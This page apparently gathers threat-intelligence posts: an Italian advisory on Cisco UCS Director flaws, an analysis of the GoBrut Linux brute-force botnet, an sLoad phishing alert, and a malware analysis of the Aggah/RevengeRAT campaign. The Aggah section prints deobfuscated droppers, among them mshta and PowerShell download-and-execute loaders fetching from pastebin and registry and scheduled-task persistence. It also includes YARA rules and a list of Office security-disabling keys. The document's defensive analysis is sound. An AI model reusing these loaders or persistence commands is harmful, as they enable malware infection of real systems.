Gravi Vulnerabilità in Infrastrutture Cisco UCS

Proto: N020819.

Con la presente Yoroi desidera informarLa riguardo alla recente scoperta di vulnerabilità critiche all’interno di Cisco UCS Director, principale software di gestione delle infrastrutture data-center e private-cloud basate su Cisco Unified Computing. Le criticità sono note con gli identificativi CVE-2019-1937, CVE-2019-1936, CVE-2019-1935.

A causa di vari errori nella gestione delle sessioni utente e delle credenziali, risulta possibile la completa compromissione della macchina bersaglio da parte di un attaccante remoto privo di autenticazioni. Le criticità citate permettono infatti di raggiungere tale obiettivo in due modalità:

  1. Attraverso l’abuso delle credenziali di default dell'utente di sistema “scpuser”, il quale può essere utilizzato anche per accessi SSH (CVE-2019-1935).
  2. Attraverso lo sfruttamento concatenato delle vulnerabilità CVE-2019-1937 e CVE-2019-1936, le quali permettono di bypassare alcuni controlli di autenticazione utente e di eseguire comandi arbitrari per via di lacune di validazione degli input nelle servlet di cambio password.

Il Vendor ha confermato le problematiche attraverso i bollettini CISCO-SA-20190821-IMCS-UCS-AUTHBY, CISCO-SA-20190821-IMCS-UCS-CMDINJ e CISCO-SA-20190821-IMCS-USERCRED dove risultano afflitte le versioni:

Considerata la potenziale criticità delle infrastrutture afflitte e la recente pubblicazione di dettagli tecnici relativi allo sfruttamento delle problematiche, Yoroi consiglia in primo luogo di cambiare le credenziali dell’utente “scpuser” attraverso la maschera raggiungibile dal menù “Administration > Users and Groups > SCP User Configuration”, in seguito di pianificare l’applicazione degli aggiornamenti di sicurezza disponibili e di verificare che eventuali servizi vulnerabili siano raggiungibili solamente da reti fidate.

Yoroi consiglia infine di mantenere alto il livello di consapevolezza degli utenti, avvisandoli periodicamente delle minacce in corso e di utilizzare un team di esperti per salvaguardare la sicurezza del perimetro "cyber". Per avere un indice di minaccia in tempo reale si consiglia di visitare il seguente link: Yoroi Cyber Security Index

New GoBrut Version in the Wild

Introduction

Back in March we spotted and monitored a new emerging threat which we dubbed as GoBrut botnet. In our previous blog post, we analyzed a Windows version of this bot, arguing about the usage of the GoLang programming language, a modern language able to reach extremely high level of code portability, potentially enabling the attackers to write code once and compile it for every OSes. That’s exactly what happened. We discovered a new version of the bot compiled for Linux hosts.

This is not the first Linux compatible GoBrut sample discovered in the wild, in fact, other security firms reported in April 2019 the version 2.24 of the bot has been compiled for Linux systems. Our recent discovery, instead, regards an even newer version of the bot, version 3.06. Even in this case it was compiled for Linux environments.

For this reason, Cybaze-Yoroi ZLAB decided to dig into this new version of the Linux GoBrut bot. 

Technical Analysis

Figure 1: Displayed malware version

During our intelligence monitoring operations, we encountered a compromised website containing a conspicuous number of suspicious files, in particular ELF binaries. The files were actually copies of the same unique sample.

Figure 2: List of the samples on the compromised website
Hash0f4755f65c495d3711bf22271f85f1ee86da8b7a487e770f769af56e189be48c
ThreatGoBrut
Brief DescriptionGoBrut Linux version 3.06
Ssdeep98304:EE1b80T1Mv8SzjLZ/YJG9MMa2megmG5OFZj8KIX:n980JpSzBsMa2ac8K

Table 1: Information about the GoBrut version 3.06

So, we proceeded to compare this latest sample with the previously known ones reported in the AlertLogic technical article.

Figure 3: Basic static information about the malware

The sample has many similarities with the other known GoBrut ones, similarities observed both during the static and the dynamic analysis session. For instance the control flow and the communication protocol are the same, the checking and the retrieval of the jobs have no major changes. In detail:

Figure 4: Registration to the C2

Also, the sample registers itself to the C2 through the path “bots/knock” indicating its kind of worker, the host OS and the version of the malware. The C2 responds with “1” as acknowledgement.

Figure 5: Check for updates

The malware indicates to the C2 its version and the target architecture and the C2 responds indicating whether some updates are available with a simple “yes/no” response.

Figure 6: Routine to retrieve the “Active Campaigns”

During the time of analysis, the only active project configured by the botnet operators was the “wpBrt” one, a “WordPress Brute Forcing” attack campaign configured to attack over 270 thousand of with third parties websites with dictionary attacks.

Figure 7: Response of C2 with the JSON file containing the targets

Like all the previous versions, also this one retrieves the target list in JSON format and starts trying to access them. At this point, we can summarize the observed behaviour of the GoBrut bot with the following diagram:

Figure 8: Sequence diagram of the GoBrut bot

A Dangerous Upgrade

As previously mentioned, the behavior of the bot remained similar to the older versions. However,  this new version has been made more powerful due to the addition of new features. It has been equipped with new brute forcing modules, in particular with:

The full set of modules can be found in the section “List of Workers” .

Target Distribution

Like our previous analysis, we collected the list of targets of the current botnet campaign and, at the time of writing, we identified more than 270k third parties destinations under attack. 

Figure 9: Comparison of National TLD occurrences between February 2019 and August 2019

In addition to the “.com”, “.org” and “.info” domains, we notice that most TLDs refer to the EMEA region and, this time, almost no Russian TLD is present. This could mean, with low confidence, the botnet operators may not want to run attacks against the Russian cyberspace, perhaps due to the possible Russian origin of its current clients. 

Also, we found over 4600 Italian TLDs appeared in the target list of this GoBrut campaign. Most of them are Small-Medium Companies running WordPress based websites, but there are also Law Firms and No-Profit Associations. As described in our Collection #1 Analysis Whitepaper (ITA), these kind of entities can also be targeted by criminals to exploit their relationship and reputation in order to reach more valuable targeted such as Enterprises, Corporates or VIPs.

Conclusion

The active development of this botnet is another indicator of the increasing popularity of GoLang even for the malware writers. This trend has also been noticed by PaloAlto Unit42 in a technical article published back in January 2019, where they observed an important increase in the number of GoLang powered malware since 2016. 

Moreover, the analysis of this StealthWorker/GoBrut version shows the increasing effort of the attackers in expanding their operations, supporting more technologies and adding other recon modules.

We also observed that the targets of this last campaign are hundred of thousand WordPress powered websites, and part of them are related to Italian economic fabric, confirming the increased dangerousness of the botnet along with the presence of ongoing malicious campaigns.

Indicators of Compromise 

Hashes

C2:

Yara Rules

import "elf"
rule GOBRUT_ELF_August_2019{

    meta:
      description = "Yara Rule for GOBRUT ELF version"
      author = "Cybaze Zlab_Yoroi"
      last_updated = "2019-08-07"
      tlp = "white"
      category = "informational"

    strings:
   		$h = {7F 45 4C 46}
		$a1 = "StealthWorker"
		$a2 = /Worker(\w+)_brut/
		$a3 = "github.com/go-pg"
    condition:
		all of them and elf.type == elf.ET_EXEC and elf.machine == elf.EM_386
}

List of Workers 

StealthWorker_WorkerPMA_check_DetectCMS
StealthWorker_WorkerPMA_check_Worker
StealthWorker_WorkerWP_check_userEnumerate
StealthWorker_WorkerWP_check_Worker
StealthWorker_WorkerWP_brut_checkBrutOk
StealthWorker_WorkerWP_brut__ptr_WP_Login
StealthWorker_WorkerWP_brut__ptr_WP_Login
StealthWorker_WorkerWP_brut_Worker
StealthWorker_WorkerWP_brut__ptr_WP_HttpClient
StealthWorker_WorkerWHM_check_DetectCMS
StealthWorker_WorkerWHM_check_Worker
StealthWorker_WorkerMagento_check_Worker
StealthWorker_WorkerMagento_check_saveGood
StealthWorker_WorkerJoomla_check_Worker
StealthWorker_WorkerJoomla_check_saveGood
StealthWorker_WorkerDrupal_check_Worker
StealthWorker_WorkerDrupal_check_saveGood
StealthWorker_WorkerCpanel_check_DetectCMS
StealthWorker_WorkerCpanel_check_Worker
StealthWorker_WorkerCpanel_check_saveGood
StealthWorker_WorkerFTP_check_ScanPort
StealthWorker_WorkerFTP_check_Worker
StealthWorker_WorkerFTP_check_saveGood
StealthWorker_WorkerPMA_brut__ptr_Instance_HttpClient
StealthWorker_WorkerPMA_brut__ptr_Instance_TryLogin
StealthWorker_WorkerPMA_brut__ptr_Instance_TryLogin
StealthWorker_WorkerPMA_brut_Instance_CheckSuccessFull
StealthWorker_WorkerPMA_brut_Worker
StealthWorker_WorkerPMA_brut__ptr_Instance_CheckSuccessFull
StealthWorker_WorkerCpanel_brut_Brut
StealthWorker_WorkerCpanel_brut_Worker
StealthWorker_WorkerWHM_brut_Brut
StealthWorker_WorkerMagento_brut_basicAuth
StealthWorker_WorkerMagento_brut_BrutRSS
StealthWorker_WorkerMagento_brut_BrutPanel
StealthWorker_WorkerMagento_brut_BrutDownloader
StealthWorker_WorkerMagento_brut_Worker
StealthWorker_WorkerJoomla_brut_Worker
StealthWorker_WorkerDrupal_brut__ptr_WP_Login
StealthWorker_WorkerDrupal_brut_Worker
StealthWorker_WorkerSSH_brut_Exe_cmd
StealthWorker_WorkerSSH_brut_check_honeypot
StealthWorker_WorkerSSH_brut_Brut
StealthWorker_WorkerSSH_brut_Worker
StealthWorker_WorkerSSH_brut_SaveGood
StealthWorker_WorkerSSH_brut_Exe_cmd_func1
StealthWorker_WorkerFTP_brut_Brut
StealthWorker_WorkerFTP_brut_SaveGood
StealthWorker_WorkerFTP_brut_CheckFalsePositive
StealthWorker_WorkerFTP_brut_Worker
StealthWorker_WorkerFTP_brut_Worker_func1
StealthWorker_WorkerMysql_brut_Brut
StealthWorker_WorkerMysql_brut_Worker
StealthWorker_WorkerPostgres_brut_Brut
StealthWorker_WorkerPostgres_brut_Worker
StealthWorker_WorkerPostgres_brut_SaveGood
StealthWorker_WorkerBackup_finder_HttpCheck
StealthWorker_WorkerBackup_finder_Worker
StealthWorker_WorkerBitrix_brut__ptr_WP_Login
StealthWorker_WorkerBitrix_brut_SaveGood
StealthWorker_WorkerBitrix_brut_Worker
StealthWorker_WorkerBitrix_brut__ptr_WP_HttpClient
StealthWorker_WorkerBitrix_check_Worker
StealthWorker_WorkerOpencart_check_Worker
StealthWorker_WorkerOpencart_brut_Worker
StealthWorker_WorkerOpencart_brut_newfileUploadRequest
StealthWorker_WorkerOpencart_brut__ptr_WP_HttpClient
StealthWorker_WorkerHtpasswd_check_Worker
StealthWorker_WorkerHtpasswd_brut_SaveGood
StealthWorker_WorkerHtpasswd_brut_Worker
StealthWorker_WorkerAdminFinder_GetPage
StealthWorker_WorkerAdminFinder_SaveGood
StealthWorker_WorkerAdminFinder_Worker
StealthWorker_Worker_WpInstall_finder_Worker
StealthWorker_Worker_WpInstall_finder_saveGood
StealthWorker_Worker_wpMagOcart_Worker
StealthWorker_Worker_WooChk_userEnumerate
StealthWorker_Worker_WooChk_Worker
StealthWorker_Worker_WooChk_saveGood
StealthWorker_WorkerQnap_check_Worker
StealthWorker_WorkerQnap_check_saveGood
StealthWorker_WorkerQnap_brut_SaveGood
StealthWorker_WorkerQnap_brut_Worker
StealthWorker_WorkerQnap_brut_newfileUploadRequest
StealthWorker_WorkerQnap_brut_HttpClient

This blog post was authored by Luigi Martire, Davide Testa and Luca Mella of Cybaze-Yoroi Z-LAB

Campagna di Email PEC Infette (sLoad)

Proto: N010819 .

Con la presente Yoroi desidera informarLa riguardo al recente rilevamento di una nuova pericolosa campagna ai danni di Organizzazioni e Aziende italiane. I messaggi infetti sono recapitati tramite posta elettronica certificata ed invitano la vittima a visionare la corrispondenza che sarebbe stata falsamente intrattenuta tra vittima ed ipotetici Istituti. Le email contengono link volti a scaricare un archivio malevolo capace di infettare la vittima con un impianto malware della famiglia sLoad (TH-163).

Figura. Esempio email PEC malevola

Si riportano in seguito gli indicatori di compromissione reperiti durante le investigazioni condotte:

Yoroi consiglia infine di mantenere alto il livello di consapevolezza degli utenti, avvisandoli periodicamente delle minacce in corso e di utilizzare un team di esperti per salvaguardare la sicurezza del perimetro "cyber". Per avere un indice di minaccia in tempo reale si consiglia di visitare il seguente link: Yoroi Cyber Security Index

The Evolution of Aggah: From Roma225 to the RG Campaign

Introduction

Few months ago we started observing a cyber operation aiming to attack private companies in various business sectors, from automotive to luxury, education, and media/marketing.  The attack attribution is still unclear but the large scale of the malicious activities has also been confirmed by Unit42, who reported attack attempt against government verticals too. 

The attacks are characterized by the usage of a Remote Access Trojan named “RevengeRat”, suggesting a possible, still unconfirmed and under investigation, connection with the Gorgon Group, a known mercenary APT group who ran cyber-espionage operations and who were involved in criminal activities too. 

Few weeks ago, Unit42 discovered another active campaign, compatible with the Roma225 one we tracked on December 2018, pointing to some interesting changes into the attackers TTPs.  Recently, we intercepted other attacks potentially related with this wider criminal operation. For this reason, Cybaze-Yoroi ZLab team decided to analyze this recent campaign in order to investigate the evolution of the Aggah threat.

Technical Analysis

The whole infection chain shows an interesting degree of sophistication, leveraging about seventeen stages: a non negligible number of steps putted in place to decouple the infection vector from the actual payload. The following info-graphics summarize the infection chain dissected in the sections below, starting from the weaponized Office document, initially delivered through malicious emails, to the final RevengeRAT payload.

Figure 1. “RG” campaign infection chain 

The Macro Dropper

Hash7c0a69f93831dcd550999b765c7922392dd0d994b0241071545749e865cc9854
ThreatDropper
Brief DescriptionXLS Macro dropper
Ssdeep768:kCSk3hOdsylKlgxopeiBNhZFGzE+ cL2kdAJ7evT8RsFbQ:kDk3hOdsylKlgxopeiBNhZFGzE+cL2kt

Table 1: Information about the RevengeRAT malicious macro dropper

All the infection starts with a malicious XLS document weaponized with an embedded macro. The VB code is polluted by a multitude of junk instructions and after a cleaning phase we isolated the essence of the malicious code.

Public Function Workbook_Open()
	rgh1 = YUcIFcEAA("tzo{h'o{{wA66ip", "7")
	rgh2 = YUcIFcEAA("{5s€6", "7")
	rgh3 = YUcIFcEAA("7O^7ixXmxmxm", "5")
	rgh = rgh1 + rgh2 + rgh3
	Shell rgh
End Function

Public Function YUcIFcEAA(Sg1NdPNeR As String, jxvMDn0vV As Integer)
    Dim PFc88so50 As Integer
    For PFc88so50 = 1 To Len(Sg1NdPNeR)
        Mid(Sg1NdPNeR, PFc88so50, 1) = Chr(Asc(Mid(Sg1NdPNeR, PFc88so50, 1)) - jxvMDn0vV)
    Next PFc88so50
    YUcIFcEAA = Sg1NdPNeR
End Function

Code Snippet 1:  real core of the macro

Figure 2: Command used to start the infection

A quick and dirty manipulation of the script enabled us to easily bypass the code obfuscation techniques protecting the next stage of the infection: the invocation of a Microsoft HTML Application hosted in a remote location.

The macro has the only purpose to run the mshta command. As defined by the Mitre, “Mshta.exe is a utility that executes Microsoft HTML Applications (HTA). HTA files have the file extension .hta. HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser.” . 

The Hidden HTA

The malware retrieves the HTA application to run from a remote host behind the Bitly shortening service. The target page is the “rg.html”, downloaded from “https[://createdbymewithdeniss[ .blogspot[.com/p/rg[.html”. Even in this case, like in the Roma255 campaign, the attacker abused the Blogger platform to hide the malicious code in plain sight.

Figure 3: Fake Blogspot page

The page does not embed any binaries or malicious links, but navigating its source code, it reveals packed HTML code dynamically injected into the page during the rendering. 

Figure 4: Malicious code contained in the malicious “blogspot” site

This additional piece of script is specifically designed to be executed by the “mshta” utility. It is a VBScript code creating a “WScript.Shell” object, a particular object decisely not designed to be loaded into regular web browsers engines. 

<script language="VBScript">
Set Xkasdj2 = CreateObject(StrReverse(StrReverse("WScript.Shell")))
Xa_aw1 = StrReverse(StrReverse("h")) + StrReverse(StrReverse(StrReverse(StrReverse("t")))) + StrReverse(StrReverse(StrReverse(StrReverse("t")))) + StrReverse(StrReverse("p")) + StrReverse(":") + StrReverse(StrReverse(StrReverse(StrReverse("/")))) + StrReverse(StrReverse(StrReverse(StrReverse("/")))) + StrReverse(StrReverse(StrReverse(StrReverse("w")))) + StrReverse(StrReverse(StrReverse(StrReverse("w")))) + StrReverse(StrReverse(StrReverse(StrReverse("w")))) + StrReverse(StrReverse(".")) + StrReverse(StrReverse("p")) + StrReverse(StrReverse("a")) + StrReverse(StrReverse("s")) + StrReverse(StrReverse(StrReverse(StrReverse("t")))) + StrReverse("e") + StrReverse("b") + StrReverse("i") + StrReverse("n") + StrReverse(StrReverse(".")) + StrReverse("c") + StrReverse("o") + StrReverse(StrReverse("m")) + StrReverse(StrReverse(StrReverse(StrReverse("/")))) + StrReverse("r") + StrReverse(StrReverse("a")) + StrReverse(StrReverse(StrReverse(StrReverse("w")))) + StrReverse(StrReverse(StrReverse(StrReverse("/"))))
Xa_aw0 = StrReverse(StrReverse("m")) + StrReverse(StrReverse("s")) + StrReverse(StrReverse("h")) + StrReverse(StrReverse(StrReverse(StrReverse("t")))) + StrReverse(" a")
Xa_aw2 = "efZDG7aL"
XXX = Xa_aw0 + Xa_aw1 + Xa_aw2
Morg = XXX
Xa_aw = Morg
Xkasdj2.Run Xa_aw, vbHide
self.close
</script>

Code Snippet 2: Javascript code after “unescape” function

The VBScript code is obfuscated using a series of “StrReverse” functions. But the action it performs is still clearly evident: call another mshta process and execute a new HTA application hosted on Pastebin (hxxp[://pastebin[.com/raw/efZDG7aL).

Figure 5: Malicious code stored on pastebin

This other script is also encoded in hexadecimal format. After its decoding its  content can be divided into four parts. The first one is responsible for killing some of the Microsoft Office suite processes, like Word, Excel, Publisher and PowerPoint.

“cmd.exe /c taskkill /f /im winword.exe & taskkill /f /im excel.exe & taskkill /f /im MSPUB.exe & taskkill /f /im POWERPNT.EXE”

Code Snippet 3: First deobfuscated piece of code

Instead, the second chunk hides the next malware stage invocation within a Powershell script.

powershell.exe [email protected](91,118,111,105,100,93,32,91,83,121,115,116,101,109,46,82,101,102,108,101,99,116,105,111,110,46,65,115,115,101,109,98,108,121,93,58,58,76,111,97,100,87,105,116,104,80,97,114,116,105,97,108,78,97,109,101,40,39,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,39,41,59,36,102,106,61,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,73,110,116,101,114,97,99,116,105,111,110,93,58,58,67,97,108,108,66,121,110,97,109,101,40,40,78,101,119,45,79,98,106,101,99,116,32,78,101,116,46,87,101,98,67,108,105,101,110,116,41,44,39,68,111,119,110,108,111,97,100,83,116,114,105,110,103,39,44,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,67,97,108,108,84,121,112,101,93,58,58,77,101,116,104,111,100,44,39,104,116,116,112,115,58,47,47,112,97,115,116,101,98,105,110,46,99,111,109,47,114,97,119,47,67,77,50,50,118,84,117,112,39,41,124,73,69,88,59,91,66,121,116,101,91,93,93,36,102,61,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,73,110,116,101,114,97,99,116,105,111,110,93,58,58,67,97,108,108,66,121,110,97,109,101,40,40,78,101,119,45,79,98,106,101,99,116,32,78,101,116,46,87,101,98,67,108,105,101,110,116,41,44,39,68,111,119,110,108,111,97,100,83,116,114,105,110,103,39,44,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,67,97,108,108,84,121,112,101,93,58,58,77,101,116,104,111,100,44,39,104,116,116,112,115,58,47,47,112,97,115,116,101,98,105,110,46,99,111,109,47,114,97,119,47,81,120,48,75,50,98,97,78,39,41,46,114,101,112,108,97,99,101,40,39,94,39,44,39,48,120,39,41,124,73,69,88,59,91,107,46,72,97,99,107,105,116,117,112,93,58,58,101,120,101,40,39,77,83,66,117,105,108,100,46,101,120,101,39,44,36,102,41);[System.Text.Encoding]::ASCII.GetString($LOLO)|IEX

Code Snippet 4: Second deobfuscated piece of code

This code snippet hides a Powershell executable stage encoded in numeric format. The correspondent ASCII text is then executed through the IEX command-let.

[void] [System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://pastebin[.com/raw/CM22vTup')|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://pastebin[.com/raw/Qx0K2baN').replace('^','0x')|IEX;[k.Hackitup]::exe('MSBuild.exe',$f)

Code Snippet 5: Deobfuscated powershell function

This code builds up the core of the malware implant (discussed in the next section). The third chunk of the code, instead, is where the attacker sets two different persistence mechanisms. Both of them invokes two different HTA application retrieved from Pastebin:

Set Xm_w = CreateObject("WScript.Shell")
L_Xe = "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\AvastUpdate"
Xm_w.RegWrite L_Xe,"mshta.exe http://pastebin[.com/raw/bMJxXtXa","REG_EXPAND_SZ"

Code Snippet 6: Third deobfuscated piece of code (part 1)

Set Mi_G = CreateObject(StrReverse(StrReverse("WScript.Shell")))
Dim We_wW
We_wW0 = StrReverse("t/ 03 om/ ETUNIM cs/ etaerc/ sksathcs")
We_wW1 = "n ""Windows Update"" /tr ""mshta.ex"
We_wW2 = "e h" + "t" + "t" + "p" + ":" + "/" + "/" + "p" + "a" + "s" + "t" + "e" + "b" + "i" + "n" + "." + "c" + "o" + "m" + "/" + "r" + "a" + "w" + "/tuGAsMze"" /F "
We_wW = We_wW0 + We_wW1 + We_wW2
Mi_G.Run We_wW, vbHide

Code Snippet 7:  Third deobfuscated piece of code (part 2)

Both of the scripts are stored onto Pastebin platform and even if  the first one has been removed, the malware maintains its persistence thanks to the execution of the second method.

The last chunk of code, the fourth, contains a huge number of Registry keys ready to be set on the target machine. This behavior has been implemented to drastically reduce the defenses of the target host, for instance disabling security features oft the Microsoft Windows and the Office ecosystem. The “Edited Registry Keys” section reports them.

The Hagga Pastes

As stated in the previous section, the Code Snippet 5 contains the core of malicious actions. The malware concurrently downloads and executes powershell code from two pastes. The first one is "CM22vTup" and have been published by a Pastebin user named “HAGGA”, the same reported in the PaloAlto analysis.

Figure 6: New payload downloaded from Pastebin

As previously hinted the Powershell code in the “CM22vTup” snippet encodes its payload in numeric format. Decoding “PAYLOAD-1“, another obfuscated Powershell script reveals the loading of a shellcode directly in the running process memory. 

[email protected](PAYLOAD-1);$p=[System.Text.Encoding]::ASCII.GetString($jk)|IEX

Code Snippet 8: Code structure of the downloaded script

[Byte[]]$sc64=iex('PAYLOAD_2'.replace('%_','0x'));$a = [Microsoft.VisualBasic.Interaction]::CallByname([AppDomain]::CurrentDomain,'Load',[Microsoft.VisualBasic.CallType]::Method,$sc64)

Code Snippet 9: Structure of the script contained in “PAYLOAD_1”

After a basic manipulation, The data hidden in “PAYLOAD_2” results to be the hexadecimal representation of a PE file, easily recognizable due to the characteristic ”4D 5A” header. 

%_4D,%_5A,%_90,%_00,%_03,%_00,%_00,%_00,%_04,%_00,%_00,%_00,%_FF,%_FF,%_00,%_00,%_B8,%_00,%_00,%_00,%_00,%_00, [.....]

Code Snippet 10: “PAYLOAD_2” in hex encoding

This PE 32 file is a well formed .Net assembly. In the following table are shown the static information about it. 

Hash84833991f1705a01a11149c9d037c8379a9c2d463dc30a2fec27bfa52d218fa6
ThreatRevengeRAT / Injector 
Brief DescriptionRevengeRAT / injector payload Obfuscated
Ssdeep768:zQosoqOovPJmzW0GzJrMfogNeEbSBUrOaqVJswUna4OI 9O:zQyoUzW0GrQ6UiaqVJ1Ua4Vs

Table 2: Information about the RevengeRAT / Injector malicious payload

Figure 7: Static information about payload described in table 2  

However, the .Net payload is not totally unprotected. In  fact it has been obfuscated with the “ConfuserEx” obfuscator.

The assembly is a Dynamic Linked Library with only one purpose: inject the payload into a target process through the well known “Process Hollowing” technique. At this stage of the infection chain the final payload could be retrieved, the RevengeRAT remote administration tool.

Figure 8: Process Hollowing references inside the PE file

The RevengeRAT Payload

Figure 9: RevengeRAT payload in hex encoding

The final payload is the one downloaded from the Pastebin page “Qx0K2baN”, as reported in Code Snippet 5. This code comes with the same obfuscation method seen in PAYLOAD_2, hex encoding together with a simple replacing routine.

Hash35e9bcc5654b1ebec035a481bc5ad67dc2341c1b534ac904c5bf28e3a5703eff
ThreatRevengeRAT
Brief DescriptionRevengeRAT injector payload Obfuscated
Ssdeep768:3Yo9AzKlOOYIl+tqRsoYGvoJGPdyOYOCbf9eThI21Os+ JZiIPxTS0X4Dwrw2T9:5AmlEIl+tqSoY2oyfYOweT6s+JlPVnz

Table 4: Information about the RevengeRAT malicious payload

Even this executable is a well formed .Net Assembly, but in this case it is obfuscated with another tool, “.Net Reactor”, a commercial code protection tool specialized in .Net applications.

Figure 10: Evidence about .NET Reactor obfuscator

Exploring the code, we found many similarities with the same RevengeRAT threat previously analyzed by us and by Unit 42. This means, with reasonable confidence, the campaign we are dissecting could be an evolution of the previous campaigns, showing an increase of the malware stealthiness and the adoption of new techniques like process hollowing in the infection chain. Despite that, the RevengeRAT core is substantially the same.

Figure 11: Comparison among RevengeRAT belonging to different campaigns

This time the recurring word is “rg”. In fact the two payloads download from the pastebin platform are “rgrunpe” and “rgbin”; also the new command and control server domains starts with the two letters “rg”, the codename of this last campaign. This time, despite the “roma225” case, the socket key of the rat is configured differently with the static string “lunlayo” and the id is “HOTEIS NOVOS” instead of “POWERScreenPOWER”.

Anyway, as shown in Figure 11, the ID and Mutex of the last two campaigns are the same, indicating the fact that the group is active and the infection campaign continues. Moreover, considering the number of views counted by the Pastebin snippet “CM22vTup”, the one delivering the RevengeRAT payload, is possible to estimate the magnitude of the attack, which may involve up to 1600 victims.

Figure 12: Hagga campaign reference

Conclusion

Since December 2018, we are following the tracks of this ambiguous cyber criminal group, internally referenced as TH-173. There are chances this whole activity could be linked with the Gorgon Group, but at the moment we have no definitive evidence of this connection.

Anyway, through the constant eyes on this threat, we observed a refinement in their infection chain while they are maintaining intact some of their TTP, such as the abuse of the Blogspot platform and legit dynamic DNS services. In fact, the group started abusing Pastebin to add complexity into the infection chain, mixing up hidden MSHTA code, Powershell scripts and also additional process injection techniques to their arsenal.

Indicator of Compromise

Yara Rules

rule rg_RevengeRAT_excel_macro_dropper_July_2019{

    meta:
      description = "Yara Rule for revengeRAT_rg"
      author = "Cybaze Zlab_Yoroi"
      last_updated = "2019-08-01"
      tlp = "white"
      category = "informational"

    strings:
   		 $a1 = {D0 CF 11 E0 A1 B1}
   		 $a2 = {EC A8 F9 46 C9 16}
   		 $a3 = {91 26 DD 88 D0 AD}
   		 $a4 = "GyjQSnPUjfNcA"
   		 $a5 = "CMG=\"2D2F8"

    condition:
   	 all of them
}

import "pe"
rule rg_RevengeRAT_payload_1_July_2019 {

    meta:
      description = "Yara Rule for revengeRAT_rg payload_1"
      author = "Cybaze Zlab_Yoroi"
      last_updated = "2019-08-01"
      tlp = "white"
      category = "informational"

    strings:
   		 $a1 = {4D 5A}
   		 $a2 = "kFeS0JCm" wide ascii
   		 $a3 = {A1 6B 31 63 EE 9F}
   		 $a4 = {06 38 70 DE FF FF 28}

    condition:
   	 2 of ($a*) and pe.number_of_sections == 3
}

import "pe"
rule rg_RevengeRAT_payload_2_July_2019{

    meta:
      description = "Yara Rule for revengeRAT_rg"
      author = "Cybaze Zlab_Yoroi"
      last_updated = "2019-08-01"
      tlp = "white"
      category = "informational"

    strings:
   		 $a1 = {4D 5A}
   		 $a2 = {93 E5 21 3F 59 AE}
   		 $a3 = {11 08 28 22}
   		 $a4 = "v2.0.507"
   		 $a5 = {E2 80 8C E2 80}
   		 $a6 = {81 AC E2 81 AF E2 80 AE}
   		 $a7 = {E2 81 AA E2 80}
   		 $a8 = {81 AF E2 80 AA}
   		 $a9 = {81 AC E2 81 AF E2 80 AE}
   		 $a10 = {C5 C7 4C 9E 65 A5 B6 42}

    condition:
   	 6 of ($a*)
}

Edited Registry keys

HKCU\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView\DisableUnsafeLocationsInPV
HKCU\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView\DisableAttachementsInPV
HKCU\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView\DisableInternetFilesInPV
HKCU\Software\Microsoft\Office\16.0\PowerPoint\Security\ProtectedView\DisableUnsafeLocationsInPV
HKCU\Software\Microsoft\Office\16.0\PowerPoint\Security\ProtectedView\DisableAttachementsInPV
HKCU\Software\Microsoft\Office\16.0\PowerPoint\Security\ProtectedView\DisableInternetFilesInPV
HKCU\Software\Microsoft\Office\16.0\Word\Security\ProtectedView\DisableUnsafeLocationsInPV
HKCU\Software\Microsoft\Office\16.0\Word\Security\ProtectedView\DisableAttachementsInPV
HKCU\Software\Microsoft\Office\16.0\Word\Security\ProtectedView\DisableInternetFilesInPV
HKCU\Software\Microsoft\Office\15.0\Excel\Security\ProtectedView\DisableUnsafeLocationsInPV
HKCU\Software\Microsoft\Office\15.0\Excel\Security\ProtectedView\DisableAttachementsInPV
HKCU\Software\Microsoft\Office\15.0\Excel\Security\ProtectedView\DisableInternetFilesInPV
HKCU\Software\Microsoft\Office\15.0\PowerPoint\Security\ProtectedView\DisableUnsafeLocationsInPV
HKCU\Software\Microsoft\Office\15.0\PowerPoint\Security\ProtectedView\DisableAttachementsInPV
HKCU\Software\Microsoft\Office\15.0\PowerPoint\Security\ProtectedView\DisableInternetFilesInPV
HKCU\Software\Microsoft\Office\15.0\Word\Security\ProtectedView\DisableUnsafeLocationsInPV
HKCU\Software\Microsoft\Office\15.0\Word\Security\ProtectedView\DisableAttachementsInPV
HKCU\Software\Microsoft\Office\15.0\Word\Security\ProtectedView\DisableInternetFilesInPV
HKCU\Software\Microsoft\Office\14.0\Excel\Security\ProtectedView\DisableUnsafeLocationsInPV
HKCU\Software\Microsoft\Office\14.0\Excel\Security\ProtectedView\DisableAttachementsInPV
HKCU\Software\Microsoft\Office\14.0\Excel\Security\ProtectedView\DisableInternetFilesInPV
HKCU\Software\Microsoft\Office\14.0\PowerPoint\Security\ProtectedView\DisableUnsafeLocationsInPV
HKCU\Software\Microsoft\Office\14.0\PowerPoint\Security\ProtectedView\DisableAttachementsInPV
HKCU\Software\Microsoft\Office\14.0\PowerPoint\Security\ProtectedView\DisableInternetFilesInPV
HKCU\Software\Microsoft\Office\14.0\Word\Security\ProtectedView\DisableUnsafeLocationsInPV
HKCU\Software\Microsoft\Office\14.0\Word\Security\ProtectedView\DisableAttachementsInPV
HKCU\Software\Microsoft\Office\14.0\Word\Security\ProtectedView\DisableInternetFilesInPV
HKCU\Software\Microsoft\Office\12.0\Excel\Security\ProtectedView\DisableUnsafeLocationsInPV
HKCU\Software\Microsoft\Office\12.0\Excel\Security\ProtectedView\DisableAttachementsInPV
HKCU\Software\Microsoft\Office\12.0\Excel\Security\ProtectedView\DisableInternetFilesInPV
HKCU\Software\Microsoft\Office\12.0\PowerPoint\Security\ProtectedView\DisableUnsafeLocationsInPV
